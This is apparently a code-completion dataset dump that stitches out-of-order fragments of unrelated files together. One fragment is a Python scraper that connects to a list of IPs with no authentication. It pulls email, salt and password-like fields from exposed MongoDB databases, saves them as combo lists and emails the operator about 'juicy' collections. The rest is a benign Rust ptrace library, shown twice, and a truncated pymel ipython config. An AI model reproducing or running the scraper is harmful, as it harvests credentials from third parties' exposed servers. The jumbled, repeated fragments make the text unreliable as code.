if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
            # Have I already processed this IP?
|
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
                    # Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
                            # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
                        # If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
                                # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json) | conditional_block |
lib.rs | use bitflags::bitflags;
use std::{
fmt,
fs::{File, OpenOptions},
io::{self, prelude::*, Result, SeekFrom},
iter,
mem::{self, MaybeUninit},
ops::{Deref, DerefMut},
os::unix::{
fs::OpenOptionsExt,
io::AsRawFd,
},
ptr, slice,
};
mod arch;
mod kernel;
macro_rules! trace {
($($inner:expr),*) => {{
if cfg!(feature = "trace") {
dbg!($($inner),*)
} else {
($($inner),*)
}
}};
}
fn e<T>(res: syscall::Result<T>) -> Result<T> {
res.map_err(|err| io::Error::from_raw_os_error(err.errno))
}
bitflags! {
pub struct Flags: u64 {
const STOP_PRE_SYSCALL = syscall::PTRACE_STOP_PRE_SYSCALL.bits();
const STOP_POST_SYSCALL = syscall::PTRACE_STOP_POST_SYSCALL.bits();
const STOP_SINGLESTEP = syscall::PTRACE_STOP_SINGLESTEP.bits();
const STOP_SIGNAL = syscall::PTRACE_STOP_SIGNAL.bits();
const STOP_BREAKPOINT = syscall::PTRACE_STOP_BREAKPOINT.bits();
const STOP_EXIT = syscall::PTRACE_STOP_EXIT.bits();
const STOP_ALL = Self::STOP_PRE_SYSCALL.bits
| Self::STOP_POST_SYSCALL.bits | Self::STOP_SINGLESTEP.bits
| Self::STOP_SIGNAL.bits | Self::STOP_BREAKPOINT.bits
| Self::STOP_EXIT.bits;
const EVENT_CLONE = syscall::PTRACE_EVENT_CLONE.bits();
const EVENT_ALL = Self::EVENT_CLONE.bits;
const FLAG_IGNORE = syscall::PTRACE_FLAG_IGNORE.bits();
const FLAG_ALL = Self::FLAG_IGNORE.bits;
}
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct Tracer {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
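    /// A rough usage sketch (the `pid` of an already-traced child is assumed here;
    /// it is not something this function provides):
    ///
    /// ```ignore
    /// let mut tracer = Tracer::attach(pid)?;
    /// let event = tracer.next(Flags::STOP_BREAKPOINT)?;
    /// println!("stopped with cause {:?}", event.cause);
    /// ```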
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a | /// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be to have
    /// control over exactly what gets requested from the kernel.
pub fn pop_one(&mut self) -> Result<Option<Event>> {
let mut event = syscall::PtraceEvent::default();
match self.inner.file.read(&mut event)? {
0 => Ok(None),
_ => Ok(Some(Event::new(event))),
}
}
/// Returns an iterator over ptrace events. This is a blocking stream.
pub fn iter(&self) -> Result<impl Iterator<Item = Result<Event>>> {
self.inner.events()
}
/// Handle non-breakpoint events by calling a specified callback until
/// breakpoint is reached
pub fn from_callback<F, E>(self, mut callback: F) -> std::result::Result<Event, E>
where
F: FnMut(Event) -> std::result::Result<(), E>,
E: From<io::Error>,
{
let mut events = self.iter()?;
loop {
let event = events.next().expect("events should be an infinite stream")?;
if event.cause & Flags::EVENT_ALL == event.cause {
callback(event)?;
} else {
break Ok(event);
}
}
}
    /// Ignore non-breakpoint events, just acknowledge them and move on
pub fn ignore(self) -> Result<Event> {
self.from_callback(|_| Ok(()))
}
}
pub struct NonblockTracer {
old_flags: Option<usize>,
inner: Tracer,
}
impl NonblockTracer {
/// Similar to `Tracer::attach`, but opens directly in nonblocking
/// mode which saves one system call.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
old_flags: None,
inner: Tracer {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.custom_flags(syscall::O_NONBLOCK as i32)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
},
})
}
/// Sets a breakpoint on the specified stop, without doing
/// anything else: No handling of events, no getting what
/// breakpoint actually caused this, no waiting for the
/// breakpoint.
pub fn next(&mut self, flags: Flags) -> Result<()> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(())
}
/// Stub that prevents you from accidentally calling `next_event`
/// on the tracer, do not use.
#[deprecated(
since = "forever",
note = "Do not use next_event on a nonblocking tracer"
)]
pub fn next_event(&mut self, _flags: Flags) -> Result<EventHandler> {
panic!("Tried to use next_event on a nonblocking tracer")
}
/// Convert this tracer back to a blocking version. Any yet unread
/// events are ignored.
pub fn blocking(self) -> Result<Tracer> {
self.events()?.for_each(|_| ());
let old_flags = match self.old_flags {
Some(flags) => flags,
None => {
let flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
flags & !syscall::O_NONBLOCK
},
};
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
old_flags,
))?;
Ok(self.inner)
}
}
impl Deref for NonblockTracer {
type Target = Tracer;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for NonblockTracer {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
impl fmt::Debug for NonblockTracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "NonblockTracer(...)")
}
} | random_line_split |
|
lib.rs | use bitflags::bitflags;
use std::{
fmt,
fs::{File, OpenOptions},
io::{self, prelude::*, Result, SeekFrom},
iter,
mem::{self, MaybeUninit},
ops::{Deref, DerefMut},
os::unix::{
fs::OpenOptionsExt,
io::AsRawFd,
},
ptr, slice,
};
mod arch;
mod kernel;
macro_rules! trace {
($($inner:expr),*) => {{
if cfg!(feature = "trace") {
dbg!($($inner),*)
} else {
($($inner),*)
}
}};
}
fn e<T>(res: syscall::Result<T>) -> Result<T> {
res.map_err(|err| io::Error::from_raw_os_error(err.errno))
}
bitflags! {
pub struct Flags: u64 {
const STOP_PRE_SYSCALL = syscall::PTRACE_STOP_PRE_SYSCALL.bits();
const STOP_POST_SYSCALL = syscall::PTRACE_STOP_POST_SYSCALL.bits();
const STOP_SINGLESTEP = syscall::PTRACE_STOP_SINGLESTEP.bits();
const STOP_SIGNAL = syscall::PTRACE_STOP_SIGNAL.bits();
const STOP_BREAKPOINT = syscall::PTRACE_STOP_BREAKPOINT.bits();
const STOP_EXIT = syscall::PTRACE_STOP_EXIT.bits();
const STOP_ALL = Self::STOP_PRE_SYSCALL.bits
| Self::STOP_POST_SYSCALL.bits | Self::STOP_SINGLESTEP.bits
| Self::STOP_SIGNAL.bits | Self::STOP_BREAKPOINT.bits
| Self::STOP_EXIT.bits;
const EVENT_CLONE = syscall::PTRACE_EVENT_CLONE.bits();
const EVENT_ALL = Self::EVENT_CLONE.bits;
const FLAG_IGNORE = syscall::PTRACE_FLAG_IGNORE.bits();
const FLAG_ALL = Self::FLAG_IGNORE.bits;
}
}
pub type Pid = usize;
#[derive(Clone, Copy, Debug)]
pub struct IntRegisters(pub syscall::IntRegisters);
impl IntRegisters {
pub fn format_syscall_bare(&self) -> String {
arch::format_syscall(None, &self)
}
pub fn format_syscall_full(&self, mem: &mut Memory) -> String {
arch::format_syscall(Some(mem), &self)
}
pub fn return_value(&self) -> usize {
arch::return_value(&self)
}
}
impl Deref for IntRegisters {
type Target = syscall::IntRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for IntRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Copy, Debug)]
pub struct FloatRegisters(pub syscall::FloatRegisters);
impl Deref for FloatRegisters {
type Target = syscall::FloatRegisters;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for FloatRegisters {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum EventData {
EventClone(usize),
StopSignal(usize, usize),
StopExit(usize),
Unknown(usize, usize, usize, usize, usize, usize),
}
#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct Event {
pub cause: Flags,
pub data: EventData,
}
impl Event {
pub fn new(inner: syscall::PtraceEvent) -> Self {
Self {
cause: Flags::from_bits_truncate(inner.cause.bits()),
data: match inner.cause {
syscall::PTRACE_EVENT_CLONE => EventData::EventClone(inner.a),
syscall::PTRACE_STOP_SIGNAL => EventData::StopSignal(inner.a, inner.b),
syscall::PTRACE_STOP_EXIT => EventData::StopExit(inner.a),
_ => EventData::Unknown(inner.a, inner.b, inner.c, inner.d, inner.e, inner.f),
},
}
}
}
pub struct Registers {
pub float: File,
pub int: File,
}
impl Registers {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
float: File::open(format!("proc:{}/regs/float", pid))?,
int: File::open(format!("proc:{}/regs/int", pid))?,
})
}
pub fn get_float(&mut self) -> Result<FloatRegisters> {
let mut regs = syscall::FloatRegisters::default();
trace!(self.float.read(&mut regs)?, ®s);
Ok(FloatRegisters(regs))
}
pub fn set_float(&mut self, regs: &FloatRegisters) -> Result<()> {
trace!(self.float.write(®s)?, ®s);
Ok(())
}
pub fn get_int(&mut self) -> Result<IntRegisters> {
let mut regs = syscall::IntRegisters::default();
trace!(self.int.read(&mut regs)?, ®s);
Ok(IntRegisters(regs))
}
pub fn set_int(&mut self, regs: &IntRegisters) -> Result<()> {
trace!(self.int.write(®s)?, ®s);
Ok(())
}
}
impl fmt::Debug for Registers {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Registers(...)")
}
}
pub struct Memory {
pub file: File,
}
impl Memory {
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: File::open(format!("proc:{}/mem", pid))?,
})
}
pub fn read(&mut self, address: *const u8, memory: &mut [u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.read_exact(memory)?;
trace!(memory);
Ok(())
}
pub fn write(&mut self, address: *const u8, memory: &[u8]) -> Result<()> {
self.file.seek(SeekFrom::Start(address as u64))?;
self.file.write_all(memory)?;
trace!(memory);
Ok(())
}
/// Writes a software breakpoint to the specified memory address, and
/// returns the previous instruction.
pub fn set_breakpoint(&mut self, address: *const u8) -> Result<u8> {
let mut previous = [0];
self.read(address, &mut previous)?;
arch::set_breakpoint(self, address)?;
Ok(previous[0])
}
pub fn cursor(&mut self) -> Result<u64> {
self.file.seek(SeekFrom::Current(0))
}
}
impl fmt::Debug for Memory {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Memory(...)")
}
}
pub struct | {
pub file: File,
pub regs: Registers,
pub mem: Memory,
}
impl Tracer {
/// Attach to a tracer with the specified PID. This will stop it.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
})
}
/// Set a breakpoint on the next specified stop, and wait for the
/// breakpoint to be reached. For convenience in the majority of
/// use-cases, this panics on non-breakpoint events and returns
/// the breaking event whenever the first matching breakpoint is
/// hit. For being able to use non-breakpoint events, see the
/// `next_event` function.
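    /// A rough usage sketch (the `pid` of an already-traced child is assumed here;
    /// it is not something this function provides):
    ///
    /// ```ignore
    /// let mut tracer = Tracer::attach(pid)?;
    /// let event = tracer.next(Flags::STOP_BREAKPOINT)?;
    /// println!("stopped with cause {:?}", event.cause);
    /// ```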
pub fn next(&mut self, flags: Flags) -> Result<Event> {
self.next_event(flags)?.from_callback(|event| {
panic!(
"`Tracer::next` should never be used to handle non-breakpoint events, see \
`Tracer::next_event` instead. Event: {:?}",
event
)
})
}
/// Similarly to `next`, but instead of conveniently returning a
/// breakpoint event, it returns an event handler that lets you
/// handle events yourself.
pub fn next_event(&mut self, flags: Flags) -> Result<EventHandler> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(EventHandler { inner: self })
}
/// Convert this tracer to be nonblocking. Setting breakpoints
/// will no longer wait by default, but you will gain access to a
/// `wait` function which will do the same as in blocking
/// mode. Useful for multiplexing tracers using the `event:`
/// scheme.
pub fn nonblocking(self) -> Result<NonblockTracer> {
let old_flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
let new_flags = old_flags | syscall::O_NONBLOCK;
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
new_flags,
))?;
Ok(NonblockTracer {
old_flags: Some(old_flags),
inner: self,
})
}
/// Same as `EventHandler::iter`, but does not rely on having an
/// event handler. When only using a blocking tracer you shouldn't
/// need to worry about this.
pub fn events(&self) -> Result<impl Iterator<Item = Result<Event>>> {
let mut buf = [MaybeUninit::<syscall::PtraceEvent>::uninit(); 4];
let mut i = 0;
let mut len = 0;
// I don't like this clone, but I don't want tracer.events()
// to prevent tracer from being borrowed again.
let mut file = self.file.try_clone()?;
Ok(iter::from_fn(move || {
if i >= len {
len = match file.read(unsafe {
slice::from_raw_parts_mut(
buf.as_mut_ptr() as *mut u8,
buf.len() * mem::size_of::<syscall::PtraceEvent>(),
)
}) {
Ok(n) => n / mem::size_of::<syscall::PtraceEvent>(),
Err(err) => return Some(Err(err)),
};
if len == 0 {
return None;
}
i = 0;
}
let ret = Event::new(unsafe { ptr::read(buf[i].as_mut_ptr()) });
trace!(&ret);
i += 1;
Some(Ok(ret))
}))
}
}
impl fmt::Debug for Tracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "Tracer(...)")
}
}
#[must_use = "The tracer won't block unless you wait for events"]
pub struct EventHandler<'a> {
inner: &'a mut Tracer,
}
impl<'a> EventHandler<'a> {
/// Pop one event. Prefer the use of the `iter` function instead
/// as it batches reads. Only reason for this would be to have
    /// control over exactly what gets requested from the kernel.
pub fn pop_one(&mut self) -> Result<Option<Event>> {
let mut event = syscall::PtraceEvent::default();
match self.inner.file.read(&mut event)? {
0 => Ok(None),
_ => Ok(Some(Event::new(event))),
}
}
/// Returns an iterator over ptrace events. This is a blocking stream.
pub fn iter(&self) -> Result<impl Iterator<Item = Result<Event>>> {
self.inner.events()
}
/// Handle non-breakpoint events by calling a specified callback until
/// breakpoint is reached
pub fn from_callback<F, E>(self, mut callback: F) -> std::result::Result<Event, E>
where
F: FnMut(Event) -> std::result::Result<(), E>,
E: From<io::Error>,
{
let mut events = self.iter()?;
loop {
let event = events.next().expect("events should be an infinite stream")?;
if event.cause & Flags::EVENT_ALL == event.cause {
callback(event)?;
} else {
break Ok(event);
}
}
}
    /// Ignore non-breakpoint events, just acknowledge them and move on
pub fn ignore(self) -> Result<Event> {
self.from_callback(|_| Ok(()))
}
}
pub struct NonblockTracer {
old_flags: Option<usize>,
inner: Tracer,
}
impl NonblockTracer {
/// Similar to `Tracer::attach`, but opens directly in nonblocking
/// mode which saves one system call.
pub fn attach(pid: Pid) -> Result<Self> {
Ok(Self {
old_flags: None,
inner: Tracer {
file: OpenOptions::new()
.read(true)
.write(true)
.truncate(true)
.custom_flags(syscall::O_NONBLOCK as i32)
.open(format!("proc:{}/trace", pid))?,
regs: Registers::attach(pid)?,
mem: Memory::attach(pid)?,
},
})
}
/// Sets a breakpoint on the specified stop, without doing
/// anything else: No handling of events, no getting what
/// breakpoint actually caused this, no waiting for the
/// breakpoint.
pub fn next(&mut self, flags: Flags) -> Result<()> {
trace!(flags, self.file.write(&flags.bits().to_ne_bytes())?);
Ok(())
}
/// Stub that prevents you from accidentally calling `next_event`
/// on the tracer, do not use.
#[deprecated(
since = "forever",
note = "Do not use next_event on a nonblocking tracer"
)]
pub fn next_event(&mut self, _flags: Flags) -> Result<EventHandler> {
panic!("Tried to use next_event on a nonblocking tracer")
}
/// Convert this tracer back to a blocking version. Any yet unread
/// events are ignored.
pub fn blocking(self) -> Result<Tracer> {
self.events()?.for_each(|_| ());
let old_flags = match self.old_flags {
Some(flags) => flags,
None => {
let flags = e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_GETFL,
0,
))?;
flags & !syscall::O_NONBLOCK
},
};
e(syscall::fcntl(
self.file.as_raw_fd() as usize,
syscall::F_SETFL,
old_flags,
))?;
Ok(self.inner)
}
}
impl Deref for NonblockTracer {
type Target = Tracer;
fn deref(&self) -> &Self::Target {
&self.inner
}
}
impl DerefMut for NonblockTracer {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.inner
}
}
impl fmt::Debug for NonblockTracer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "NonblockTracer(...)")
}
}
| Tracer | identifier_name |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
